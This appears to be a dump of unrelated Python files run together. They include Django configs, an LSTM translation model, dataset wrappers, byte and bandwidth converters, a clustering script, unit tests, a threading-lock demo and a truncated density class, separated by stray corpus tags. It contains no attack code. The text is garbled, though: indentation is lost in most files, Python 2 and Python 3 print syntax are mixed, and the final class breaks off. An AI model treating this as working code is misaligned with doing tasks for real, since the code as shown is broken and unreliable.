from django.apps import AppConfig
class KoperationConfig(AppConfig):
name = 'koperation'
from scraper.scraper import Scraper
from scraper.template import Template
def start_scraping():
job_name = input('Enter job name: ')
place = input('Enter place: ')
radius = int(input('Enter radius: '))
scraper = Scraper(job_name, place, radius)
print(f'URL: {scraper.page.url}, Place: {scraper.location}, Job name: \
{scraper.job_name}\n')
template = Template(scraper.offers, scraper.number_of_offers)
if __name__ == '__main__':
start_scraping()
class Initializer:
def __init__(self, interval):
self.interval = interval
from django.apps import AppConfig
class RatingsConfig(AppConfig):
name = 'authors.apps.ratings'
import torch
import torch.nn as nn
from torch.autograd import Variable
import onmt.modules
class Encoder(nn.Module):
def __init__(self, opt, dicts):
self.layers = opt.layers
self.num_directions = 2 if opt.brnn else 1
assert opt.rnn_size % self.num_directions == 0
self.hidden_size = opt.rnn_size // self.num_directions
inputSize = opt.word_vec_size
super(Encoder, self).__init__()
self.word_lut = nn.Embedding(dicts.size(),
opt.word_vec_size,
padding_idx=onmt.Constants.PAD)
self.rnn = nn.LSTM(inputSize, self.hidden_size,
num_layers=opt.layers,
dropout=opt.dropout,
bidirectional=opt.brnn)
# self.rnn.bias_ih_l0.data.div_(2)
# self.rnn.bias_hh_l0.data.copy_(self.rnn.bias_ih_l0.data)
if opt.pre_word_vecs_enc is not None:
pretrained = torch.load(opt.pre_word_vecs_enc)
            self.word_lut.weight.data.copy_(pretrained)
def forward(self, input, hidden=None):
batch_size = input.size(0) # batch first for multi-gpu compatibility
emb = self.word_lut(input).transpose(0, 1)
if hidden is None:
h_size = (self.layers * self.num_directions, batch_size, self.hidden_size)
h_0 = Variable(emb.data.new(*h_size).zero_(), requires_grad=False)
c_0 = Variable(emb.data.new(*h_size).zero_(), requires_grad=False)
hidden = (h_0, c_0)
outputs, hidden_t = self.rnn(emb, hidden)
return hidden_t, outputs
class StackedLSTM(nn.Module):
def __init__(self, num_layers, input_size, rnn_size, dropout):
super(StackedLSTM, self).__init__()
self.dropout = nn.Dropout(dropout)
self.num_layers = num_layers
for i in range(num_layers):
layer = nn.LSTMCell(input_size, rnn_size)
self.add_module('layer_%d' % i, layer)
input_size = rnn_size
def forward(self, input, hidden):
h_0, c_0 = hidden
h_1, c_1 = [], []
for i in range(self.num_layers):
layer = getattr(self, 'layer_%d' % i)
h_1_i, c_1_i = layer(input, (h_0[i], c_0[i]))
input = h_1_i
            if i + 1 != self.num_layers:
input = self.dropout(input)
h_1 += [h_1_i]
c_1 += [c_1_i]
h_1 = torch.stack(h_1)
c_1 = torch.stack(c_1)
return input, (h_1, c_1)
class Decoder(nn.Module):
def __init__(self, opt, dicts):
self.layers = opt.layers
self.input_feed = opt.input_feed
input_size = opt.word_vec_size
if self.input_feed:
input_size += opt.rnn_size
super(Decoder, self).__init__()
self.word_lut = nn.Embedding(dicts.size(),
opt.word_vec_size,
padding_idx=onmt.Constants.PAD)
self.rnn = StackedLSTM(opt.layers, input_size, opt.rnn_size, opt.dropout)
self.attn = onmt.modules.GlobalAttention(opt.rnn_size)
self.dropout = nn.Dropout(opt.dropout)
# self.rnn.bias_ih.data.div_(2)
# self.rnn.bias_hh.data.copy_(self.rnn.bias_ih.data)
self.hidden_size = opt.rnn_size
        if opt.pre_word_vecs_dec is not None:
            pretrained = torch.load(opt.pre_word_vecs_dec)
            self.word_lut.weight.data.copy_(pretrained)
def forward(self, input, hidden, context, init_output):
emb = self.word_lut(input).transpose(0, 1)
batch_size = input.size(0)
h_size = (batch_size, self.hidden_size)
output = Variable(emb.data.new(*h_size).zero_(), requires_grad=False)
# n.b. you can increase performance if you compute W_ih * x for all
# iterations in parallel, but that's only possible if
# self.input_feed=False
outputs = []
output = init_output
for i, emb_t in enumerate(emb.chunk(emb.size(0), dim=0)):
emb_t = emb_t.squeeze(0)
if self.input_feed:
emb_t = torch.cat([emb_t, output], 1)
output, h = self.rnn(emb_t, hidden)
output, attn = self.attn(output, context.t())
output = self.dropout(output)
outputs += [output]
outputs = torch.stack(outputs)
return outputs.transpose(0, 1), h, attn
class NMTModel(nn.Module):
def __init__(self, encoder, decoder, generator):
super(NMTModel, self).__init__()
self.encoder = encoder
self.decoder = decoder
self.generator = generator
self.generate = False
def set_generate(self, enabled):
self.generate = enabled
def make_init_decoder_output(self, context):
batch_size = context.size(1)
h_size = (batch_size, self.decoder.hidden_size)
return Variable(context.data.new(*h_size).zero_(), requires_grad=False)
def _fix_enc_hidden(self, h):
# the encoder hidden is (layers*directions) x batch x dim
# we need to convert it to layers x batch x (directions*dim)
if self.encoder.num_directions == 2:
return h.view(h.size(0) // 2, 2, h.size(1), h.size(2)) \
.transpose(1, 2).contiguous() \
.view(h.size(0) // 2, h.size(1), h.size(2) * 2)
else:
return h
def forward(self, input):
src = input[0]
tgt = input[1][:, :-1] # exclude last target from inputs
enc_hidden, context = self.encoder(src)
init_output = self.make_init_decoder_output(context)
enc_hidden = (self._fix_enc_hidden(enc_hidden[0]),
self._fix_enc_hidden(enc_hidden[1]))
out, dec_hidden, _attn = self.decoder(tgt, enc_hidden, context, init_output)
if self.generate:
out = self.generator(out)
return out
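# A minimal usage sketch (not part of the original file): `opt`, `src_dict`,
# `tgt_dict` and the generator below are hypothetical stand-ins for the
# training options, vocabularies and output projection.
#
#   from argparse import Namespace
#   opt = Namespace(layers=2, rnn_size=500, brnn=True, word_vec_size=300,
#                   dropout=0.3, input_feed=1,
#                   pre_word_vecs_enc=None, pre_word_vecs_dec=None)
#   encoder = Encoder(opt, src_dict)
#   decoder = Decoder(opt, tgt_dict)
#   model = NMTModel(encoder, decoder, nn.Linear(opt.rnn_size, tgt_dict.size()))
#   out = model((src_batch, tgt_batch))  # batch-first LongTensors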
import torch.utils.data as data
from torchvision import transforms
from .cifar import CorruptionDataset, cifar_transform, imagenet_transform
from .visda import VisDaTest, visda_test_transforms
from .adversarial import ImagenetAdversarial, imageneta_transforms
from .randaugment import RandAugment
from .augmix import AugMix
class WrapperDataset(data.Dataset):
def __init__(self, dataset, augmentations, transforms=None, multi_out=True):
super().__init__()
self.dataset = dataset
self.transforms = transforms
self.augmentations = augmentations if transforms else lambda *args: augmentations(args[0])
self.multi_out = multi_out
def __getitem__(self, index):
x, y = self.dataset[index]
if self.multi_out:
im_tuple = (self.transforms(x), self.augmentations(x), self.augmentations(x))
else:
im_tuple = (self.augmentations(x), )
return im_tuple, y
def __len__(self):
return len(self.dataset)
def get_dataset(dataset, augmentation, corruption=None, level=None, **aug_args):
if dataset == 'visda':
dataset = VisDaTest()
transform = visda_test_transforms
elif dataset in ['imagenet', 'cifar100', 'cifar10']:
transform = imagenet_transform if dataset == 'imagenet' else cifar_transform
dataset = CorruptionDataset(dataset, corruption=corruption, level=level)
    elif dataset == 'imageneta':
        transform = imageneta_transforms
        dataset = ImagenetAdversarial()
    else:
        raise ValueError('unknown dataset: {}'.format(dataset))
if augmentation.lower() == 'randaugment':
augmentation = transforms.Compose([RandAugment(**aug_args), transform])
elif augmentation.lower() == 'augmix':
augmentation = AugMix(base_transforms=transform, **aug_args)
return WrapperDataset(dataset, augmentations=augmentation, transforms=transform)
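# A minimal usage sketch (an assumption: the corruption files read by
# CorruptionDataset are available locally):
#
#   ds = get_dataset('cifar10', 'randaugment', corruption='gaussian_noise', level=3)
#   loader = data.DataLoader(ds, batch_size=64)
#   (im_clean, im_aug1, im_aug2), y = next(iter(loader))  # multi_out=True default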
# -*- coding: utf-8 -*-
"""
Python Collection Of Functions.
Package with collection of small useful functions.
Bytes calculator
"""
def bytes2human(size, *, unit="", precision=2, base=1024):
"""
Convert number in bytes to human format.
Arguments:
size (int): bytes to be converted
Keyword arguments (opt):
unit (str): If it will convert bytes to a specific unit
'KB', 'MB', 'GB', 'TB', 'PB', 'EB'
precision (int): number of digits after the decimal point
base (int): 1000 - for decimal base
1024 - for binary base (it is the default)
    Returns:
        (str): number
        (str): unit ('Bytes', 'KB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB')
Example:
>>> bytes2human(10)
('10.00', 'Bytes')
>>> bytes2human(2048)
('2.00', 'KB')
>>> bytes2human(27273042329)
('25.40', 'GB')
>>> bytes2human(27273042329, precision=1)
('25.4', 'GB')
>>> bytes2human(27273042329, unit='MB')
('26009.60', 'MB')
"""
# validate parameters
if not isinstance(precision, int):
raise ValueError("precision is not a number")
if not isinstance(base, int):
raise ValueError("base is not a number")
try:
num = float(size)
except ValueError:
raise ValueError("value is not a number")
suffix = ["Bytes", "KB", "MB", "GB", "TB", "PB", "EB", "ZB"]
# If it needs to convert bytes to a specific unit
if unit:
try:
num = num / base ** suffix.index(unit)
except ValueError:
raise ValueError("Error: unit must be {}".format(", ".join(suffix[1:])))
return "{0:.{prec}f}".format(num, prec=precision), unit
    # Calculate the greatest unit for that size
for counter, suffix_unit in enumerate(suffix):
if num < base:
return "{0:.{prec}f}".format(num, prec=precision), suffix_unit
if counter == len(suffix) - 1:
raise ValueError("value greater than the highest unit")
num /= base
def human2bytes(size, unit, *, precision=2, base=1024):
"""
Convert size from human to bytes.
Arguments:
size (int): number
unit (str): converts from this unit to bytes
'KB', 'MB', 'GB', 'TB', 'PB', 'EB'
Keyword arguments (opt):
precision (int): number of digits after the decimal point
default is 2
base (int): 1000 - for decimal base
1024 - for binary base (it is the default)
    Returns:
        (str): number in bytes
Example:
>>> human2bytes(10, 'GB')
'10737418240.00'
>>> human2bytes(10, 'GB', precision=0)
'10737418240'
>>> human2bytes(10, 'PB')
'11258999068426240.00'
"""
dic_power = {
"KB": base,
"MB": base ** 2,
"GB": base ** 3,
"TB": base ** 4,
"PB": base ** 5,
"EB": base ** 6,
"ZB": base ** 7,
}
if unit not in dic_power:
raise ValueError(
"invalid unit. It must be {}".format(", ".join(dic_power.keys()))
)
try:
num_bytes = float(size) * int(dic_power[unit])
except ValueError:
raise ValueError("value is not a number")
return "{0:.{prec}f}".format(num_bytes, prec=precision)
def bandwidth_converter(
number, *, from_unit, to_unit, from_time="seconds", to_time="seconds"
):
"""
Bandwidth Calculator.
Convert data rate from one unit to another.
Arguments:
number (int): number to be converted
Keyword arguments:
from_unit (str): convert from this data unit. Example:
(bps, Kbps, Mbps, Gbps... KB, KiB, MB, MiB...)
to_unit (str): convert to this data unit. Example:
(bps, Kbps, Mbps, Gbps... KB, KiB, MB, MiB...)
Keyword arguments (opt):
from_time (str): Specify the time frame used in from_unit
(seconds, minutes, hours, days, months)
default: seconds
to_time (str): Specify the time frame used in to_unit
(seconds, minutes, hours, days, months)
default: seconds
bps, Kbps, Mbps, Gbps... = decimal base = 1000^n
KB, MB, GB, TB... = decimal base = 1000^n
KiB, MiB, GiB, TiB... = binary base = 1024^n
References:
- https://en.wikipedia.org/wiki/Units_of_information
- https://physics.nist.gov/cuu/Units/binary.html
Returns: tuple
(number_converted, to_unit/to_time)
Example:
>>> bandwidth_converter(100, from_unit="Mbps", to_unit="MB")
(12.5, 'MB/seconds')
>>> bandwidth_converter(100, from_unit="Mbps", to_unit="GB", to_time="hours")
(45.0, 'GB/hours')
>>> bandwidth_converter(1, from_unit="Gbps", to_unit="MB")
(125.0, 'MB/seconds')
>>> bandwidth_converter(10, from_unit="Gbps", to_unit="GB")
(1.25, 'GB/seconds')
>>> bandwidth_converter(10, from_unit="Gbps", to_unit="TB", to_time="hours")
(4.5, 'TB/hours')
>>> bandwidth_converter(10, from_unit="GB", to_unit="Gbps")
(80.0, 'Gbps/seconds')
    Convert 2.25 GB per hour to Mbps:
>>> bandwidth_converter(2.25, from_unit="GB", from_time="hours", to_unit="Mbps", to_time="seconds") # noqa
(5.0, 'Mbps/seconds')
"""
unit_power = {
"bps": 1,
"Kbps": 1000,
"Mbps": 1000 ** 2,
"Gbps": 1000 ** 3,
"Tbps": 1000 ** 4,
"Pbps": 1000 ** 5,
"Ebps": 1000 ** 6,
"Bytes": 1,
"KB": 1000,
"MB": 1000 ** 2,
"GB": 1000 ** 3,
"TB": 1000 ** 4,
"PB": 1000 ** 5,
"EB": 1000 ** 6,
"KiB": 1024,
"MiB": 1024 ** 2,
"GiB": 1024 ** 3,
"TiB": 1024 ** 4,
"PiB": 1024 ** 5,
"EiB": 1024 ** 6,
}
time_in_sec = {
"seconds": 1,
"minutes": 60,
"hours": 3600,
"days": 3600 * 24,
"months": 3600 * 24 * 30,
}
if from_unit not in unit_power or to_unit not in unit_power:
raise ValueError(
"invalid unit. It must be {}".format(", ".join(unit_power.keys()))
)
if from_time not in time_in_sec or to_time not in time_in_sec:
raise ValueError(
"invalid time. It must be {}".format(", ".join(time_in_sec.keys()))
)
# Convert input number to bps
bps = (float(number) * int(unit_power[from_unit])) / time_in_sec[from_time]
if not from_unit.endswith("bps"):
bps = bps * 8
# to_unit is bits or bytes
new_unit = bps if to_unit.endswith("bps") else bps / 8
# Convert to new unit
new_unit = (new_unit / unit_power[to_unit]) * time_in_sec[to_time]
return new_unit, "{}/{}".format(to_unit, to_time)
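# Not part of the original module: a small self-check entry point, added so the
# doctest examples in the docstrings above can be verified directly.
if __name__ == "__main__":
    import doctest
    doctest.testmod()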
# vim: ts=4
import numpy as np
import pandas as pd
from sklearn import preprocessing
import matplotlib.pyplot as plt
import matplotlib
PLOT_TYPE_TEXT = False # For indices
PLOT_VECTORS = True # For original features in P.C.-Space
matplotlib.style.use('ggplot') # Look Pretty
c = ['red', 'green', 'blue', 'orange', 'yellow', 'brown']
def drawVectors(transformed_features, components_, columns, plt):
num_columns = len(columns)
# This function will project the original feature onto the principal component feature-space,
# Scaling the principal components by the max value in
# the transformed set belonging to that component
xvector = components_[0] * max(transformed_features[:,0])
yvector = components_[1] * max(transformed_features[:,1])
# Sorting each column by its length.
import math
important_features = { columns[i] : math.sqrt(xvector[i]**2 + yvector[i]**2) for i in range(num_columns) }
important_features = sorted(zip(important_features.values(), important_features.keys()), reverse=True)
print "Projected Features by importance:\n", important_features
ax = plt.axes()
for i in range(num_columns):
# Using an arrow to project each original feature as a
# labeled vector on the principal component axes
plt.arrow(0, 0, xvector[i], yvector[i], color='b', width=0.0005, head_width=0.02, alpha=0.75, zorder=600000)
plt.text(xvector[i]*1.2, yvector[i]*1.2, list(columns)[i], color='b', alpha=0.75, zorder=600000)
return ax
def doPCA(data, dimensions=2):
from sklearn.decomposition import PCA
import sklearn
    print(sklearn.__version__)
model = PCA(n_components=dimensions, svd_solver='randomized', random_state=7)
model.fit(data)
return model
def doKMeans(data, clusters=0):
from sklearn.cluster import KMeans
kmeans = KMeans(n_clusters = clusters)
kmeans.fit(data)
    model = kmeans
return model.cluster_centers_, model.labels_
import os
os.chdir("Datasets")
df = pd.read_csv("Wholesale customers data.csv", sep=',', header = 0)
# Setting Nans to 0
df = df.fillna(0)
df.drop(['Channel','Region'], axis = 1, inplace = True)
df.plot.hist()
# Removing top 5 and bottom 5 samples for each column to reduce big gaps
drop = {}
for col in df.columns:
# Bottom 5
sort = df.sort_values(by=col, ascending=True)
if len(sort) > 5: sort=sort[:5]
for index in sort.index: drop[index] = True # Just store the index once
# Top 5
sort = df.sort_values(by=col, ascending=False)
if len(sort) > 5: sort=sort[:5]
for index in sort.index: drop[index] = True # Just store the index once
#
# Dropping rows by index.
print "Dropping {0} Outliers...".format(len(drop))
df.drop(inplace=True, labels=drop.keys(), axis=0)
#
# Un-commenting one line at a time before running the code
T = preprocessing.StandardScaler().fit_transform(df)
#T = preprocessing.MinMaxScaler().fit_transform(df)
#T = preprocessing.MaxAbsScaler().fit_transform(df)
#T = preprocessing.Normalizer().fit_transform(df)
#T = df # No Change
# KMeans
n_clusters = 3
centroids, labels = doKMeans(T, n_clusters)
#
# Printing out the centroids.
print(centroids)
# Projecting the centroids and samples into the new 2D feature space
display_pca = doPCA(T)
T = display_pca.transform(T)
CC = display_pca.transform(centroids)
# Visualizing all the samples and giving them the color of their cluster label
fig = plt.figure()
ax = fig.add_subplot(111)
if PLOT_TYPE_TEXT:
# Plotting the index of the sample
for i in range(len(T)): ax.text(T[i,0], T[i,1], df.index[i], color=c[labels[i]], alpha=0.75, zorder=600000)
ax.set_xlim(min(T[:,0])*1.2, max(T[:,0])*1.2)
ax.set_ylim(min(T[:,1])*1.2, max(T[:,1])*1.2)
else:
# Plotting a regular scatter plot
sample_colors = [ c[labels[i]] for i in range(len(T)) ]
ax.scatter(T[:, 0], T[:, 1], c=sample_colors, marker='o', alpha=0.2)
# Plotting the Centroids as X's
    ax.scatter(CC[:, 0], CC[:, 1], marker='x', s=169, linewidths=3, zorder=1000, c=c[:n_clusters])
for i in range(len(centroids)): ax.text(CC[i, 0], CC[i, 1], str(i), zorder=500010, fontsize=18, color=c[i])
# Displaying the feature vectors
if PLOT_VECTORS: drawVectors(T, display_pca.components_, df.columns, plt)
# Adding the cluster label back into the dataframe
df['label'] = pd.Series(labels, index=df.index)
print(df)
plt.show()
from phenotype.Core.Auxiliary import (
__apply__,
__identity__,
)
def Lookup(key_func=__identity__, val_func=__identity__): return __apply__(key_func, val_func)
class Hasher(dict):
''' '''
__key_value_function__ = Lookup(id)
__key__ = id
@classmethod
def __key_value__(cls, item):
''' '''
return cls.__key_value_function__(item)
def __init__(self, *items):
''' '''
        super().__init__(map(self.__key_value_function__, items))
    def __len__(self):
        ''' '''
        return dict.__len__(self)
    def __contains__(self, item):
        ''' '''
        return dict.__contains__(self, self.__key__(item))
    def __iter__(self):
        ''' '''
        yield from dict.items(self)
    def __getitem__(self, item):
        ''' '''
        hashed = self.__key__(item)
        return self.get(hashed, None)
    def __call__(self, item):
        ''' '''
        hashed = self.__key__(item)
        dict.__setitem__(self, hashed, item)
        return hashed
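# A minimal usage sketch (not in the original module): items are stored under
# their id() and looked up by the object itself.
#
#   h = Hasher()
#   obj = object()
#   key = h(obj)  # store the object; returns id(obj)
#   assert obj in h and h[obj] is obj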
import math
import unittest
from typing import *
import mock
import pytest
import tensorkit as tk
from tensorkit import tensor as T
from tensorkit.distributions import Categorical, FlowDistribution, UnitNormal
from tensorkit.distributions.utils import copy_distribution
from tensorkit.flows import ReshapeFlow, ActNorm
from tensorkit.tensor import Tensor, float_scalar_like, int_range
from tests.helper import *
class _MyFlow(tk.flows.Flow):
def _transform(self,
input: Tensor,
input_log_det: Optional[Tensor],
inverse: bool,
compute_log_det: bool
) -> Tuple[Tensor, Optional[Tensor]]:
if inverse:
output = input * 2.0 + 1
event_ndims = self.x_event_ndims
else:
output = (input - 1.0) * 0.5
event_ndims = self.y_event_ndims
if compute_log_det:
if inverse:
output_log_det = float_scalar_like(-math.log(2.), output)
else:
output_log_det = float_scalar_like(math.log(2.), output)
for axis in int_range(-event_ndims, 0):
output_log_det = output_log_det * output.shape[axis]
if input_log_det is not None:
output_log_det = output_log_det + input_log_det
else:
output_log_det: Optional[Tensor] = None
return output, output_log_det
def check_flow_distribution(ctx,
distribution,
flow):
min_event_ndims = flow.get_y_event_ndims()
max_event_ndims = (distribution.value_ndims +
(flow.get_y_event_ndims() - flow.get_x_event_ndims()))
def fn(event_ndims, reparameterized, validate_tensors):
# construct the instance
kwargs = {}
if reparameterized is not None:
kwargs['reparameterized'] = reparameterized
else:
reparameterized = distribution.reparameterized
if event_ndims is not None:
kwargs['event_ndims'] = event_ndims
else:
event_ndims = flow.get_y_event_ndims()
if validate_tensors is not None:
kwargs['validate_tensors'] = validate_tensors
else:
validate_tensors = distribution.validate_tensors
d = FlowDistribution(distribution, flow, **kwargs)
# check the instance
def log_prob_fn(t):
log_px = distribution.log_prob(t.transform_origin.tensor,
group_ndims=0)
y, log_det = flow(t.transform_origin.tensor) # y and log |dy/dx|
assert_allclose(y, t.tensor, atol=1e-4, rtol=1e-6)
ctx.assertEqual(
T.rank(log_det),
T.rank(log_px) - (flow.get_x_event_ndims() - distribution.event_ndims)
)
return -log_det + T.reduce_sum(
log_px, T.int_range(
-(flow.get_x_event_ndims() - distribution.event_ndims),
0
)
)
check_distribution_instance(
ctx=ctx,
d=d,
event_ndims=event_ndims,
batch_shape=distribution.batch_shape[: max_event_ndims - event_ndims],
min_event_ndims=min_event_ndims,
max_event_ndims=max_event_ndims,
log_prob_fn=log_prob_fn,
transform_origin_distribution=distribution,
transform_origin_group_ndims=flow.get_x_event_ndims() - distribution.event_ndims,
# other attributes
base_distribution=distribution,
flow=flow,
dtype=distribution.dtype,
continuous=distribution.continuous,
reparameterized=reparameterized,
validate_tensors=validate_tensors,
)
for event_ndims in (None,
min_event_ndims,
(min_event_ndims + max_event_ndims) // 2,
max_event_ndims):
fn(event_ndims, None, None)
for reparameterized in (None, True, False):
fn(None, reparameterized, None)
for validate_tensors in (None, True, False):
fn(None, None, validate_tensors)
class FlowDistributionTestCase(TestCase):
def test_FlowDistribution(self):
check_flow_distribution(
self,
UnitNormal([], event_ndims=0),
_MyFlow(x_event_ndims=0, y_event_ndims=0, explicitly_invertible=True),
)
check_flow_distribution(
self,
UnitNormal([2, 3, 4], event_ndims=0),
_MyFlow(x_event_ndims=0, y_event_ndims=0, explicitly_invertible=True),
)
check_flow_distribution(
self,
UnitNormal([2, 3, 4], event_ndims=0),
ActNorm(4),
)
check_flow_distribution(
self,
UnitNormal([2, 3, 4], event_ndims=1),
ReshapeFlow([-1], [-1, 1]),
)
check_flow_distribution(
self,
UnitNormal([2, 3, 4], event_ndims=1),
ReshapeFlow([-1, 1], [-1]),
)
# errors in constructor
with pytest.raises(TypeError,
match='`distribution` is not an instance of '
'`Distribution`'):
_ = FlowDistribution(object(), ActNorm(3))
with pytest.raises(TypeError, match='`flow` is not a flow'):
_ = FlowDistribution(UnitNormal([3]), object())
with pytest.raises(ValueError,
match='cannot be transformed by a flow, because '
'it is not continuous'):
_ = FlowDistribution(Categorical(logits=[0., 1., 2.]), ActNorm(3))
with pytest.raises(ValueError,
match='cannot be transformed by a flow, because '
'its `dtype` is not floating point'):
normal = UnitNormal([3])
normal.dtype = T.int32
_ = FlowDistribution(normal, ActNorm(3))
with pytest.raises(ValueError,
match='`distribution.event_ndims <= flow.'
'x_event_ndims <= distribution.value_ndims` '
'is not satisfied'):
_ = FlowDistribution(UnitNormal([2, 3, 4], event_ndims=2),
ActNorm(4))
with pytest.raises(ValueError,
match='`distribution.event_ndims <= flow.'
'x_event_ndims <= distribution.value_ndims` '
'is not satisfied'):
_ = FlowDistribution(UnitNormal([2, 3, 4], event_ndims=2),
_MyFlow(x_event_ndims=4, y_event_ndims=4,
explicitly_invertible=True))
with pytest.raises(ValueError,
match='`event_ndims` out of range: .* '
'minimum allowed value is 2, .* '
'maximum allowed value is 4'):
_ = FlowDistribution(
UnitNormal([2, 3, 4]), ReshapeFlow([-1], [-1, 1]), event_ndims=1)
with pytest.raises(ValueError,
match='`event_ndims` out of range: .* '
'minimum allowed value is 2, .* '
'maximum allowed value is 4'):
_ = FlowDistribution(
UnitNormal([2, 3, 4]), ReshapeFlow([-1], [-1, 1]), event_ndims=5)
def test_copy(self):
normal = UnitNormal([2, 3, 5], dtype=T.float64, validate_tensors=True)
flow = ActNorm(5)
distrib = FlowDistribution(normal, flow)
self.assertEqual(distrib.event_ndims, 1)
self.assertTrue(distrib.reparameterized)
self.assertTrue(distrib.validate_tensors)
with mock.patch('tensorkit.distributions.flow.copy_distribution',
wraps=copy_distribution) as f_copy:
distrib2 = distrib.copy(event_ndims=2, reparameterized=False,
validate_tensors=False)
self.assertIsInstance(distrib2, FlowDistribution)
self.assertIs(distrib2.flow, flow)
self.assertIsInstance(distrib2.base_distribution, UnitNormal)
self.assertEqual(distrib2.reparameterized, False)
self.assertEqual(distrib2.event_ndims, 2)
self.assertFalse(distrib2.validate_tensors)
self.assertEqual(f_copy.call_args, ((), {
'cls': FlowDistribution,
'base': distrib,
'attrs': (('distribution', '_base_distribution'), 'flow',
'reparameterized', 'event_ndims', 'validate_tensors'),
'overrided_params': {'event_ndims': 2,
'reparameterized': False,
'validate_tensors': False},
}))
| nilq/baby-python | python |
import toml
import argparse
import numpy as np
from scipy.stats import entropy
from pom import POM
from sample_script import get_points_covered_by_lidar_config
def evaluate(map, pom_params, lidar_params, config):
points = get_points_covered_by_lidar_config(
pom_params, lidar_params, config, lidar_params['lidar_nos']
)
H_entropy = 0.0 # -plogp-(1-p)log(1-p)
total_entropy = 0.0
for x in map:
for xy in x:
for xyz in xy:
if xyz == 0.0 or xyz == 1:
continue
total_entropy += entropy([1 - xyz, xyz])
for point in range(len(points)):
p = map[points[point]]
if p == 0.0 or p == 1:
continue
H_entropy += entropy([1-p,p])
return H_entropy, total_entropy, total_entropy - H_entropy
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-p','--params', type=str, default="multihyper.toml", help="Params")
parser.add_argument('-c','--configuration', type=str, default="config.toml", help="Configuration")
args = parser.parse_args()
params = toml.load(args.params)
configs = toml.load(args.configuration)['config']
pom_car, num_valid_frames_car = POM(
random=True, pom_params=params["pom"], lidar_params=params["lidar"]
).create_data_from_logs(
"./routes/square/vehicle"
)
    print("built vehicle POM")
pom_car = pom_car.astype(float) / num_valid_frames_car
pom_ped, num_valid_frames_ped = POM(
random=True, pom_params=params["pom"], lidar_params=params["lidar"]
).create_data_from_logs(
"./routes/square/pedestrian"
)
pom_ped = pom_ped.astype(float) / num_valid_frames_ped
pom_cyc, num_valid_frames_cyc = POM(
random=True, pom_params=params["pom"], lidar_params=params["lidar"]
).create_data_from_logs(
"./routes/square/cyclist"
)
pom_cyc = pom_cyc.astype(float) / num_valid_frames_cyc
type = ['square', 'center', 'line', 'pyramid', 'trapezoid', 'line_roll', 'pyramid_roll',
'pyramid_pitch']
pom_list = [('car', pom_car), ('ped', pom_ped), ('cyc', pom_cyc)]
for key, config in configs.items():
for pom in pom_list:
H_entropy, total_entropy, IG = evaluate(pom[1], params['pom'], params['lidar'], config)
print(
f"Key {type[int(key)]}, {pom[0]}: H_entropy {H_entropy}, total_entropy {total_entropy}, IG {IG}") | nilq/baby-python | python |
from cubelang.actions import Action
from cubelang.cube import Cube
from cubelang.orientation import Orientation, Side, Color
from cubelang.cli.cube_builder import apply_side, CubeBuilder
from pytest import raises
from unittest import mock
import pytest
import string
import argparse
from typing import List
class TestApplySide:
orientation = Orientation(Side.RIGHT, Side.BOTTOM)
def test_apply_side(self):
cube = Cube((2, 2, 2))
colors = [[Color.WHITE, Color.RED], [Color.ORANGE, Color.GREEN]]
apply_side(cube, self.orientation, colors)
actual_colors = [[cube.get_side(self.orientation).colors[i, j] for j in [0, 1]] for i in [0, 1]]
assert colors == actual_colors
def test_wrong_columns(self):
cube = Cube((2, 2, 2))
colors = [[Color.WHITE, Color.RED, Color.BLUE], [Color.ORANGE, Color.GREEN, Color.BLUE]]
with raises(argparse.ArgumentTypeError) as e:
apply_side(cube, self.orientation, colors)
assert str(e.value) == "Incorrect number of columns"
def test_wrong_lines(self):
cube = Cube((2, 2, 2))
colors = [[Color.WHITE, Color.RED]]
with raises(argparse.ArgumentTypeError) as e:
apply_side(cube, self.orientation, colors)
assert str(e.value) == "Incorrect number of lines"
class MockAction (Action):
def __init__(self, results: List[str], name: str):
self.results = results
self.name = name
def perform(self, cube: Cube, orientation: Orientation) -> Orientation:
self.results.append(self.name)
return Orientation(Side.LEFT, Side.RIGHT)
class TestBuilder:
def test_create(self):
builder = CubeBuilder((2, 2, 2))
cube, orientation = builder.get()
assert cube.shape == (2, 2, 2)
assert orientation.top == Side.TOP
assert orientation.front == Side.FRONT
@mock.patch("cubelang.cli.cube_builder.apply_side")
@pytest.mark.parametrize("side, exp_orientation", [
(Side.FRONT, Orientation(Side.FRONT, Side.TOP)),
(Side.LEFT, Orientation(Side.LEFT, Side.TOP)),
(Side.RIGHT, Orientation(Side.RIGHT, Side.TOP)),
(Side.BACK, Orientation(Side.BACK, Side.TOP)),
(Side.TOP, Orientation(Side.TOP, Side.BACK)),
(Side.BOTTOM, Orientation(Side.BOTTOM, Side.FRONT))
])
def test_side(self, apply_side_fn, side, exp_orientation):
builder = CubeBuilder((2, 2, 2))
builder.side(side, [])
apply_side_fn.assert_called_once_with(builder.cube, exp_orientation, [])
def test_scramble(self):
result = []
actions = [MockAction(result, string.ascii_uppercase[i]) for i in range(10)]
builder = CubeBuilder((2, 2, 2))
builder.scramble(actions)
_, orientation = builder.get()
assert orientation == Orientation(Side.LEFT, Side.RIGHT)
assert result == list("ABCDEFGHIJ")
| nilq/baby-python | python |
"""
线程锁-互斥锁
为什么要使用线程锁分析:https://blog.csdn.net/JackLiu16/article/details/81267176
互斥锁运行顺序分析:https://blog.csdn.net/weixin_40481076/article/details/101594705
"""
import threading,time
# instantiate a mutex lock object
lock = threading.Lock()
def run():
    lock.acquire()  # acquire the lock
    print(threading.current_thread().getName(), time.ctime())
    time.sleep(5)
    lock.release()  # release the lock
for _ in range(10):
t = threading.Thread(target=run)
t.start()
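# Equivalent context-manager form (added for illustration, not in the original):
# a Lock supports the `with` statement, which releases the lock even if the
# body raises.
def run_with_lock():
    with lock:
        print(threading.current_thread().getName(), time.ctime())
        time.sleep(5)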
import FWCore.ParameterSet.Config as cms
from RecoBTag.Skimming.btagMC_QCD_800_1000_cfi import *
btagMC_QCD_800_1000Path = cms.Path(btagMC_QCD_800_1000)
def getLocation(config):
config['serverType']="regularExperiment"
config['serverPort']=2345
config['webSocketPort']=3456
ip="localhost"
config["domain"]="http://"+ip+":"+str(config['serverPort'])
config["websocketURL"]="ws://"+ip+":"+str(config['webSocketPort'])
    return config
import torch.nn as nn
import torch
class Density(nn.Module):
def __init__(self, params_init={}):
super().__init__()
for p in params_init:
param = nn.Parameter(torch.tensor(params_init[p]))
setattr(self, p, param)
def forward(self, sdf, beta=None):
return self.density_func(sdf, beta=beta)
class LaplaceDensity(Density): # alpha * Laplace(loc=0, scale=beta).cdf(-sdf)
def __init__(self, params_init={}, beta_min=0.0001):
super().__init__(params_init=params_init)
